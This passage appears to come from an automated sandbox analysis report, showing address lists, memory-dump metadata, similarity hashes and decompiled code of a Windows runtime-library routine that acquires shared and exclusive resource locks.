				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                      0x01fb0b21
                                                                                                                                                      0x01fb0b24
                                                                                                                                                      0x01fb0b27
                                                                                                                                                      0x01fb0b2a
                                                                                                                                                      0x01fb0b2d
                                                                                                                                                      0x01fb0b30
                                                                                                                                                      0x01fb0b33
                                                                                                                                                      0x01fb0b36
                                                                                                                                                      0x01fb0b39
                                                                                                                                                      0x01fb0b3e
                                                                                                                                                      0x01fb0c65
                                                                                                                                                      0x01fb0c68
                                                                                                                                                      0x01fb0c6a
                                                                                                                                                      0x01fb0c6f
                                                                                                                                                      0x01fdeb42
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb48
                                                                                                                                                      0x01fdeb48
                                                                                                                                                      0x01fb0c75
                                                                                                                                                      0x01fb0c7a
                                                                                                                                                      0x01fdeb54
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb5a
                                                                                                                                                      0x01fb0c80
                                                                                                                                                      0x01fb0c84
                                                                                                                                                      0x01fdeb98
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeba6
                                                                                                                                                      0x01fb0cb8
                                                                                                                                                      0x01fb0cba
                                                                                                                                                      0x01fb0cd3
                                                                                                                                                      0x01fb0cda
                                                                                                                                                      0x01fb0ce4
                                                                                                                                                      0x01fb0ce9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0cec
                                                                                                                                                      0x01fb0c8c
                                                                                                                                                      0x01fdeb63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb70
                                                                                                                                                      0x01fdeb75
                                                                                                                                                      0x01fdeb7d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb8c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb8c
                                                                                                                                                      0x01fb0c96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0ca2
                                                                                                                                                      0x01fb0cac
                                                                                                                                                      0x01fb0cb4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b44
                                                                                                                                                      0x01fb0b47
                                                                                                                                                      0x01fb0b49
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b4f
                                                                                                                                                      0x01fb0b50
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b56
                                                                                                                                                      0x01fb0b62
                                                                                                                                                      0x01fb0b7c
                                                                                                                                                      0x01fb0bac
                                                                                                                                                      0x01fb0a0f
                                                                                                                                                      0x01fdeaaa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeac4
                                                                                                                                                      0x01fdeac4
                                                                                                                                                      0x01fb0bd0
                                                                                                                                                      0x01fb0bd0
                                                                                                                                                      0x01fb0bd4
                                                                                                                                                      0x01fb0bd9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bdb
                                                                                                                                                      0x01fb0be0
                                                                                                                                                      0x01fdeb0e
                                                                                                                                                      0x01fb0a1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0a1a
                                                                                                                                                      0x01fdeb1a
                                                                                                                                                      0x01fdeb1f
                                                                                                                                                      0x01fdeb27
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb36
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb36
                                                                                                                                                      0x01fb0bea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bf6
                                                                                                                                                      0x01fb0c00
                                                                                                                                                      0x01fb0c03
                                                                                                                                                      0x01fb0c0b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c0b
                                                                                                                                                      0x01fdeaaa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0a15
                                                                                                                                                      0x01fb0bb6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bc6
                                                                                                                                                      0x01fb0bc6
                                                                                                                                                      0x01fb0bcb
                                                                                                                                                      0x01fb0c15
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c1d
                                                                                                                                                      0x01fb0c20
                                                                                                                                                      0x01fb0c21
                                                                                                                                                      0x01fb0c24
                                                                                                                                                      0x01fb0c24
                                                                                                                                                      0x01fb0c26
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c26
                                                                                                                                                      0x01fb0bcd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0bcd
                                                                                                                                                      0x01fb0b89
                                                                                                                                                      0x01fb0b89
                                                                                                                                                      0x01fb0b90
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b96
                                                                                                                                                      0x01fb0a04
                                                                                                                                                      0x01fb0a04
                                                                                                                                                      0x01fb0b9a
                                                                                                                                                      0x01fb0b9a
                                                                                                                                                      0x01fb0b9b
                                                                                                                                                      0x01fb0b9f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0ba5
                                                                                                                                                      0x01fb0ac7
                                                                                                                                                      0x01fb0aca
                                                                                                                                                      0x01fdeacf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeade
                                                                                                                                                      0x01fdeade
                                                                                                                                                      0x01fdeae3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeaf3
                                                                                                                                                      0x01fdeaf6
                                                                                                                                                      0x01fdeaf7
                                                                                                                                                      0x01fdeafe
                                                                                                                                                      0x01fdeb01
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeb01
                                                                                                                                                      0x01fdeacf
                                                                                                                                                      0x01fb0ad0
                                                                                                                                                      0x01fb0ad4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0ada
                                                                                                                                                      0x01fb0ae6
                                                                                                                                                      0x01fb0c34
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c47
                                                                                                                                                      0x01fb0c49
                                                                                                                                                      0x01fb0c4a
                                                                                                                                                      0x01fb0c4e
                                                                                                                                                      0x01fb0c51
                                                                                                                                                      0x01fb0c54
                                                                                                                                                      0x01fb0c57
                                                                                                                                                      0x01fb0c5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0c60
                                                                                                                                                      0x01fb0afb
                                                                                                                                                      0x01fb0afe
                                                                                                                                                      0x01fb0b02
                                                                                                                                                      0x01fb0b05
                                                                                                                                                      0x01fb0b08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0b08
                                                                                                                                                      0x01fb0ae6
                                                                                                                                                      0x01fb0b44
                                                                                                                                                      0x01fb09f8
                                                                                                                                                      0x01fb09f8
                                                                                                                                                      0x01fb09f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fdeaa0
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID: .$:$:
                                                                                                                                                      • API String ID: 3965848254-2308638275
                                                                                                                                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction ID: d13209b659a9bb27cee30bb6ce9ff40bd52df696b2ff62639c6f4e86e1835237
                                                                                                                                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                      • Instruction Fuzzy Hash: 90A180B1D0070ADADB25CF5AC8856FFBBB9AF05304F28846AF542A7241DF329A41CB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01FB0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E01FB0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
									_push(_t144);
									_push(0);
									_t51 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01FB4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01FC3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01FF217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01FC3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01FB3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020501c0;
												_push(_t138);
												_push(0);
												_t58 = E01F6F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01FB4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01FC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01FC3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01FF217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01FC3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01FB3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01F95384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01F6F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01FB3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01FB3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01F6F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01FB3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E01F95329(_t110, _t138);
																_t69 = E01F953A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                      0x01fb055a
                                                                                                                                                      0x01fb055d
                                                                                                                                                      0x01fb0563
                                                                                                                                                      0x01fb0566
                                                                                                                                                      0x01fb05d8
                                                                                                                                                      0x01fb05e2
                                                                                                                                                      0x01fb05e5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb05e7
                                                                                                                                                      0x01fb05e7
                                                                                                                                                      0x01fb05ea
                                                                                                                                                      0x01fb05f3
                                                                                                                                                      0x01fb05f3
                                                                                                                                                      0x01fb0568
                                                                                                                                                      0x01fb0568
                                                                                                                                                      0x01fb0568
                                                                                                                                                      0x01fb0569
                                                                                                                                                      0x01fb0569
                                                                                                                                                      0x01fb0569
                                                                                                                                                      0x01fb056b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd217f
                                                                                                                                                      0x01fd2183
                                                                                                                                                      0x01fd225b
                                                                                                                                                      0x01fd225f
                                                                                                                                                      0x01fd2189
                                                                                                                                                      0x01fd218c
                                                                                                                                                      0x01fd218f
                                                                                                                                                      0x01fd2194
                                                                                                                                                      0x01fd2199
                                                                                                                                                      0x01fd219d
                                                                                                                                                      0x01fd21a0
                                                                                                                                                      0x01fd21a2
                                                                                                                                                      0x01fd21ce
                                                                                                                                                      0x01fd21ce
                                                                                                                                                      0x01fd21ce
                                                                                                                                                      0x01fd21d0
                                                                                                                                                      0x01fd21d6
                                                                                                                                                      0x01fd21de
                                                                                                                                                      0x01fd21e2
                                                                                                                                                      0x01fd21e8
                                                                                                                                                      0x01fd21e9
                                                                                                                                                      0x01fd21ec
                                                                                                                                                      0x01fd21f1
                                                                                                                                                      0x01fd21f6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd21f8
                                                                                                                                                      0x01fd21fb
                                                                                                                                                      0x01fd2206
                                                                                                                                                      0x01fd220b
                                                                                                                                                      0x01fd220c
                                                                                                                                                      0x01fd2217
                                                                                                                                                      0x01fd2226
                                                                                                                                                      0x01fd222b
                                                                                                                                                      0x01fd222c
                                                                                                                                                      0x01fd222f
                                                                                                                                                      0x01fd2232
                                                                                                                                                      0x01fd2235
                                                                                                                                                      0x01fd2235
                                                                                                                                                      0x01fd223a
                                                                                                                                                      0x01fd223f
                                                                                                                                                      0x01fd2241
                                                                                                                                                      0x01fd2243
                                                                                                                                                      0x01fd2248
                                                                                                                                                      0x01fd2248
                                                                                                                                                      0x01fd224d
                                                                                                                                                      0x01fd224f
                                                                                                                                                      0x01fd2262
                                                                                                                                                      0x01fd2263
                                                                                                                                                      0x01fd2268
                                                                                                                                                      0x01fd2269
                                                                                                                                                      0x01fd2269
                                                                                                                                                      0x01fd2269
                                                                                                                                                      0x01fd226d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2276
                                                                                                                                                      0x01fd2279
                                                                                                                                                      0x01fd227e
                                                                                                                                                      0x01fd2283
                                                                                                                                                      0x01fd2287
                                                                                                                                                      0x01fd228a
                                                                                                                                                      0x01fd228d
                                                                                                                                                      0x01fd228f
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22bc
                                                                                                                                                      0x01fd22be
                                                                                                                                                      0x01fd22c4
                                                                                                                                                      0x01fd22cc
                                                                                                                                                      0x01fd22d0
                                                                                                                                                      0x01fd22d6
                                                                                                                                                      0x01fd22d7
                                                                                                                                                      0x01fd22da
                                                                                                                                                      0x01fd22df
                                                                                                                                                      0x01fd22e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22e6
                                                                                                                                                      0x01fd22e9
                                                                                                                                                      0x01fd22f4
                                                                                                                                                      0x01fd22f9
                                                                                                                                                      0x01fd22fa
                                                                                                                                                      0x01fd2305
                                                                                                                                                      0x01fd2314
                                                                                                                                                      0x01fd2319
                                                                                                                                                      0x01fd231a
                                                                                                                                                      0x01fd231d
                                                                                                                                                      0x01fd2320
                                                                                                                                                      0x01fd2323
                                                                                                                                                      0x01fd2323
                                                                                                                                                      0x01fd2328
                                                                                                                                                      0x01fd232d
                                                                                                                                                      0x01fd232f
                                                                                                                                                      0x01fd2331
                                                                                                                                                      0x01fd2336
                                                                                                                                                      0x01fd2336
                                                                                                                                                      0x01fd233b
                                                                                                                                                      0x01fd233d
                                                                                                                                                      0x01fd2350
                                                                                                                                                      0x01fd2351
                                                                                                                                                      0x01fd2356
                                                                                                                                                      0x01fd2359
                                                                                                                                                      0x01fd2359
                                                                                                                                                      0x01fd235b
                                                                                                                                                      0x01fd235d
                                                                                                                                                      0x01f95367
                                                                                                                                                      0x01f9536b
                                                                                                                                                      0x01f95372
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2363
                                                                                                                                                      0x01fd2363
                                                                                                                                                      0x01fd2369
                                                                                                                                                      0x01fd236a
                                                                                                                                                      0x01fd236c
                                                                                                                                                      0x01fd2371
                                                                                                                                                      0x01fd2373
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2379
                                                                                                                                                      0x01fd2379
                                                                                                                                                      0x01fd237a
                                                                                                                                                      0x01fd237f
                                                                                                                                                      0x01fd237f
                                                                                                                                                      0x01fd2385
                                                                                                                                                      0x01fd2386
                                                                                                                                                      0x01fd2389
                                                                                                                                                      0x01fd238e
                                                                                                                                                      0x01fd2390
                                                                                                                                                      0x01f95378
                                                                                                                                                      0x01f9537c
                                                                                                                                                      0x01fd2396
                                                                                                                                                      0x01fd2396
                                                                                                                                                      0x01fd2397
                                                                                                                                                      0x01fd239c
                                                                                                                                                      0x01fd23a2
                                                                                                                                                      0x01fd23a3
                                                                                                                                                      0x01fd23a6
                                                                                                                                                      0x01fd23ab
                                                                                                                                                      0x01fd23ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd23b3
                                                                                                                                                      0x01fd23b3
                                                                                                                                                      0x01fd23b4
                                                                                                                                                      0x01fd23b9
                                                                                                                                                      0x01fd23ba
                                                                                                                                                      0x01fd23ba
                                                                                                                                                      0x01fd23bc
                                                                                                                                                      0x01fd23bf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9153
                                                                                                                                                      0x01fc9158
                                                                                                                                                      0x01fc915a
                                                                                                                                                      0x01fc915e
                                                                                                                                                      0x01fc9160
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9166
                                                                                                                                                      0x01fc9166
                                                                                                                                                      0x01fc9171
                                                                                                                                                      0x01fc9176
                                                                                                                                                      0x01fc9176
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fc9160
                                                                                                                                                      0x01fd23c6
                                                                                                                                                      0x01fd23ce
                                                                                                                                                      0x01fd23d7
                                                                                                                                                      0x01fd23d7
                                                                                                                                                      0x01fd23ad
                                                                                                                                                      0x01fd2390
                                                                                                                                                      0x01fd2373
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd233f
                                                                                                                                                      0x01fd2291
                                                                                                                                                      0x01fd2291
                                                                                                                                                      0x01fd2293
                                                                                                                                                      0x01fd2295
                                                                                                                                                      0x01fd229a
                                                                                                                                                      0x01fd22a1
                                                                                                                                                      0x01fd22a3
                                                                                                                                                      0x01fd22a7
                                                                                                                                                      0x01fd22a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22ab
                                                                                                                                                      0x01fd22ad
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22af
                                                                                                                                                      0x01fd22b1
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b4
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953be
                                                                                                                                                      0x01f953c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953cb
                                                                                                                                                      0x01f953ce
                                                                                                                                                      0x01f953d0
                                                                                                                                                      0x01f953d4
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953d8
                                                                                                                                                      0x01f953e3
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x01f953ea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01f953d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd22b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd228f
                                                                                                                                                      0x01fd2349
                                                                                                                                                      0x01fd234d
                                                                                                                                                      0x01fd2251
                                                                                                                                                      0x01fd2251
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2251
                                                                                                                                                      0x01fd21a4
                                                                                                                                                      0x01fd21a4
                                                                                                                                                      0x01fd21a6
                                                                                                                                                      0x01fd21a8
                                                                                                                                                      0x01fd21ac
                                                                                                                                                      0x01fd21b6
                                                                                                                                                      0x01fd21b8
                                                                                                                                                      0x01fd21bc
                                                                                                                                                      0x01fd21be
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd21c0
                                                                                                                                                      0x01fd21c2
                                                                                                                                                      0x01fd21c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd21c4
                                                                                                                                                      0x01fd21c6
                                                                                                                                                      0x01fd21c6
                                                                                                                                                      0x01fd21c8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd21c8
                                                                                                                                                      0x01fd21a2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fd2183
                                                                                                                                                      0x01fb057b
                                                                                                                                                      0x01fb057d
                                                                                                                                                      0x01fb0581
                                                                                                                                                      0x01fb0583
                                                                                                                                                      0x01fd2178
                                                                                                                                                      0x00000000
                                                                                                                                                      0x01fb0589
                                                                                                                                                      0x01fb058f
                                                                                                                                                      0x01fb058f
                                                                                                                                                      0x01fb0583
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FD2206
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-4236105082
                                                                                                                                                      • Opcode ID: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                      • Instruction ID: dca7bca31cbd74be4376a8577c9ec816dd77d71fdfe7769e689f4a2a8b611fdd
                                                                                                                                                      • Opcode Fuzzy Hash: 7e14a8a8b044ece05c1bbcde080f85da3cc211bfb93e709a6af9893f63a29573
                                                                                                                                                      • Instruction Fuzzy Hash: 19512835B00212ABEB15CE29CCC1FA673AAAF94721F25825DFD55DB285D923EC4287D0
